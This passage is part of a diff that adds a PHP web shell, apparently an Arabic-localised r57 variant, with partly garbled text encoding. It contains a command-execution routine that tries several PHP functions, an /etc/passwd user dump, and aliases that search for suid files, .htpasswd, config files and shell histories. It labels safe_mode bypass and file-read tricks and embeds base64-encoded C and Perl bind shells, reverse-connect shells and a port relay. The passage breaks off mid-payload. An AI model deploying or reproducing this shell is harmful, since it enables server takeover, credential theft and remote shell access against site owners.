+'eng_text67'=>'ÇáÊÕÑíÍ/ÇáãÓÊÎÏã/ÇáãÌãæÚÉ',
+'eng_text68'=>'ÇãÑ',
+'eng_text69'=>'ÅÓã ÇáãáÝ',
+'eng_text70'=>'ÇáÊÕÑíÍ',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'ÇáäÕ ÇáãÑÇÏ',
+'eng_text73'=>'ÈÍË Ýí ÇáãÌáÏÇÊ',
+'eng_text74'=>'ÈÍË Ýí ÇáãáÝÇÊ',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'ÇáÈÍË Úä äÕ Ýí ãáÝÇÊ ÈæÇÓØå find',
+'eng_text80'=>'ÇáäæÚ',
+'eng_text81'=>'ÇáÅÊÕÇáÇÊ',
+'eng_text82'=>'ÞæÇÚÏ ÇáÈíÇäÇÊ',
+'eng_text83'=>'ÊÔÛíá ÇãÑ ÇÓÊÚáÇã',
+'eng_text84'=>'ÇÓÊÚáÇã ÞÇÚÏÉ',
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'eng_text86'=>'ÊäÒíá ãáÝÇÊ ãä ÇáÓíÑÝÑ',
+'eng_butt14'=>'ÊÍãíá',
+'eng_text87'=>'ÊäÒíá ãáÝÇÊ ãä ÎÇÏã ÇáÇÝ Êí Èí',
+'eng_text88'=>'ÓíÑÝÑ ÇáÇÝ Êí Èí:ÇáãäÝÐ',
+'eng_text89'=>'ãáÝ Ýí ÇáÇÝ Êí Èí',
+'eng_text90'=>'ÇáÊÍæíá Çáì',
+'eng_text91'=>'ÇÑÔÝÉ',
+'eng_text92'=>'ãä ÛíÑ ÇáÇÑÔÝÉ',
+'eng_text93'=>'ÇáÇÝ Êí Èí',
+'eng_text94'=>'ÊÎãíä ÇáÇÝ Êí Èí',
+'eng_text95'=>'ÞÇÆãÉ ÇáãÓÊÎÏãíä',
+'eng_text96'=>'áã íÓÊØÚ ÓÍÈ ÞÇÆãÉ ÇáãÓÊÎÏãíä',
+'eng_text97'=>'Êã ÇáÝÍÕ: ',
+'eng_text98'=>'Êã ÈäÌÇÍ: ',
+'eng_text99'=>'* ÇÓÊÎÏã ÇÓãÇÁ ÇáãÓÊÎÏãíä Ýí ãáÝ /etc/passwd áÏÎæá ááÜ ftp',
+'eng_text100'=>'ÇÑÓÇá ãáÝ Çáì ÎÇÏã ÇáÇÝ Êí Èí',
+'eng_text101'=>'ÇÓÊÎÏã ÇáÇÓÇãí ãÚßæÓå áÊÎãíäåÇ',
+'eng_text102'=>'ÎÏãÇÊ ÇáÈÑíÏ',
+'eng_text103'=>'ÇÑÓÇá ÈÑíÏ',
+'eng_text104'=>'ÇÑÓÇá ãáÝ Çáì ÇáÇíãíá',
+'eng_text105'=>'Åáì',
+'eng_text106'=>'ãÜä',
+'eng_text107'=>'ÇáãæÖæÚ',
+'eng_butt15'=>'ÅÑÓÇá',
+'eng_text108'=>'ÇáÑÓÇáÉ',
+'eng_text109'=>'ãÎÝí',
+'eng_text110'=>'ÚÑÖ',
+'eng_text111'=>'ÓíÑÝÑ ÞæÇÚÏ ÇáÈíÇäÇÊ : ÇáãäÝÐ',
+'eng_text112'=>'ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ ÏÇáå mb_send_mail',
+'eng_text113'=>'ÞÑÇÆÉ ãÍÊæì ÇáãÌáÏÇÊ Úä ØÑíÞ via imap_list',
+'eng_text114'=>'ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ via imap_body',
+'eng_text115'=>'ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ compress.zlib://',
+'eng_text116'=>'äÓÎ ãä',
+'eng_text117'=>'Çáì',
+'eng_text118'=>'Êã äÓÎ ÇáãáÝ',
+'eng_text119'=>'áÇíÓÊØíÚ ÇáäÓÎ',
+'eng_err0'=>'ÎØÇÁ ! áÇíãßä ÇáßÊÇÈÉ Úáì åÐÇ ÇáãáÝ ',
+'eng_err1'=>'ÎØÇÁ ! ÛíÑ ÞÇÏÑ Úáì ÞÑÇÆå åÐÇ ÇáãáÝ ',
+'eng_err2'=>'ÎØÇÁ! áÇíãßä ÇáÇäÔÇÁ ',
+'eng_err3'=>'ÎØÇÁ! ÛíÑ ÞÇÏÑ Úáì ÇáÇÊÕÇá ÈÇáÇÝ Êí Èí',
+'eng_err4'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÇáÏÎæá Çáì ÓíÑÝÑ ÇáÇÝ Êí Èí',
+'eng_err5'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÊÛíÑ ÇáãÌáÏ Ýí ÇáÇÝ Êí Èí',
+'eng_err6'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÇÑÓÇá ÑÓÇáå',
+'eng_err7'=>'ÇáÈÑíÏ ÇÑÓá',
+'eng_text200'=>'ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ copy()',
+'eng_text202'=>'ãÓÇÑ ÇáãáÝ ÇáãÑÇÏ ÞÑÇÆÊå',
+'eng_text300'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ curl()',
+'eng_text302'=>'ãÓÇÑ ÇáãáÝ ÇáãÑÇÏ ÞÑÇÆÊå',
+);
+/*
+?????? ??????
+????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
+?? ?????? ???? ????????? ??? ???????? ???????.
+*/
+$aliases=array(
+'ÇáÈÍË Úä ãáÝÇÊ suid'=>'find / -type f -perm -04000 -ls',
+'ÇáÈÍË Úä ãáÝÇÊ suid Ýí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -perm -04000 -ls',
+'ÇáÈÍË Úä ãáÝÇÊ suid'=>'find / -type f -perm -02000 -ls',
+'ÇáÈÍË Úä ãáÝÇÊ suid Ýí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -perm -02000 -ls',
+'ÇáÈÍË Úä ãáÝÇÊ config.inc.php'=>'find / -type f -name config.inc.php',
+'ÇáÈÍË Úä ãáÝÇÊ config.inc.php Ýí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -name config.inc.php',
+'ÇáÈÍË Úä ãáÝÇÊ config* ÈÌãíÚ ÇáÇãÊÏÇÏÇÊ'=>'find / -type f -name "config*"',
+'ÇáÈÍË Úä ãáÝÇÊ config* Ýí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -name "config*"',
+'ÇáÈÍË Úä ÇáãáÝÇÊ ÇáÞÇÈáÉ ááßÊÇÈÉ'=>'find / -type f -perm -2 -ls',
+'ÇáÈÍË Úä ÇáãáÝÇÊ ÇáÞÇÈáÉ ááßÊÇÈÉ Ýí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -perm -2 -ls',
+'ÇáÈÍË Úä ÇáãÌáÏÇÊ ÇáÞÇÈáÉ ááßÊÇÈÉ'=>'find /  -type d -perm -2 -ls',
+'ÇáÈÍË Úä ÇáãÌáÏÇÊ ÇáÞÇÈáÉ ááßÊÇÈÉ Ýí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type d -perm -2 -ls',
+'ÇáÈÍË Úä ãáÝÇÊ æãÌáÏÇÊ ÞÇÈáÉ ááßÊÇÈÉ'=>'find / -perm -2 -ls',
+'ÇáÈÍË Úä ãáÝÇÊ æãÌáÏÇÊ Ýí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -perm -2 -ls',
+'ÇáÈÍË Úä ãáÝÇÊ service.pwd'=>'find / -type f -name service.pwd',
+'ÇáÈÍË Úä ãáÝÇÊ service.pwd Ýí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name service.pwd',
+'ÇáÈÍË Úä ßá ãáÝÇÊ ÇáÌÏÑÇä ÇáäÇÑíÉ .htpasswd'=>'find / -type f -name .htpasswd',
+'ÇáÈÍË Úä ÌãíÚ ãáÝÇÊ ÇáÌÏÑÇä ÇáäÇÑíÉ Ýí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .htpasswd',
+'ÇáÈÍË Úä ÌãíÚ ãáÝÇÊ .bash_history'=>'find / -type f -name .bash_history',
+'ÇáÈÍË Úä ÌãíÚ ãáÝÇÊ .bash_history Ýí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .bash_history',
+'ÇáÈÍË Úä ÌãíÚ ãáÝÇÊ .mysql_history'=>'find / -type f -name .mysql_history',
+'ÇáÈÍË Úä ÌãíÚ ãáÝÇÊ .mysql_history Ýí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .mysql_history',
+'ÇáÈÍË Úä ÌãíÚ ãáÝÇÊ .fetchmailrc'=>'find / -type f -name .fetchmailrc',
+'ÇáÈÍË Úä ÌãíÚ ãáÝÇÊ .fetchmailrc Ýí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .fetchmailrc',
+'ÇÎÑ ãáÝÇÊ ãÔÛáå Ýí ÇáäÙÇã'=>'lsattr -va',
+'ÑÄíÉ ÇáÈæÑÊÇÊ ÇáãÝÊæÍÉ Ýí ÇáÓíÑÝÑ'=>'netstat -an | grep -i listen',
+'ÑÄíÉ ÍÇáÉ ÇáãÌáÏÇÊ æÇãßÇäíÉ ÇáÊäÝíÐ'=>'cat /etc/fstab',
+'ãÔÇåÏÉ ãáÝ ÇááæÞ áÏÎæá ÇáÓí ÈÇäá æÇáãæÇÞÚ Úáì ÇáÓíÑÝÑ'=>'cat /var/cpanel/accounting.log',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#000000><font face=tahoma size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Webdings color=gray>4</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=tahoma size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if(isset($_GET['users']))
+ {
+ if(!$users=get_users()) { echo "<center><font face=tahoma size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
+ else
+  {
+  echo '<center>';
+  foreach($users as $user) { echo $user."<br>"; }
+  echo '</center>';
+  }
+ echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
+if(empty($dir))
+ {
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); }
+ if(empty($os)){ $os ="-"; $unix=1; }
+ else
+    {
+    if(@eregi("^win",$os)) { $unix = 0; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=tahoma size=-2><b>".ws(3);
+        $r .= (!$unix)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=tahoma size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=tahoma size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=tahoma size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die();
+  }
+if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function get_users()
+{
+  $users = array();
+  $rows=file('/etc/passwd');
+  if(!$rows) return 0;
+  foreach ($rows as $string)
+   {
+           $user = @explode(":",$string);
+           if(substr($string,0,1)!='#') array_push($users,$user[0]);
+   }
+  return $users;
+}
+function err($n,$txt='')
+{
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>';
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
+if(!empty($txt)) { echo " $txt"; }
+echo '</b></div></font></td></tr></table>';
+return null;
+}
+function perms($mode)
+{
+if (!$GLOBALS['unix']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value,$checked=0)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\"";
+ if($checked) $ret .= " checked";
+ return $ret.">";
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err(0);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
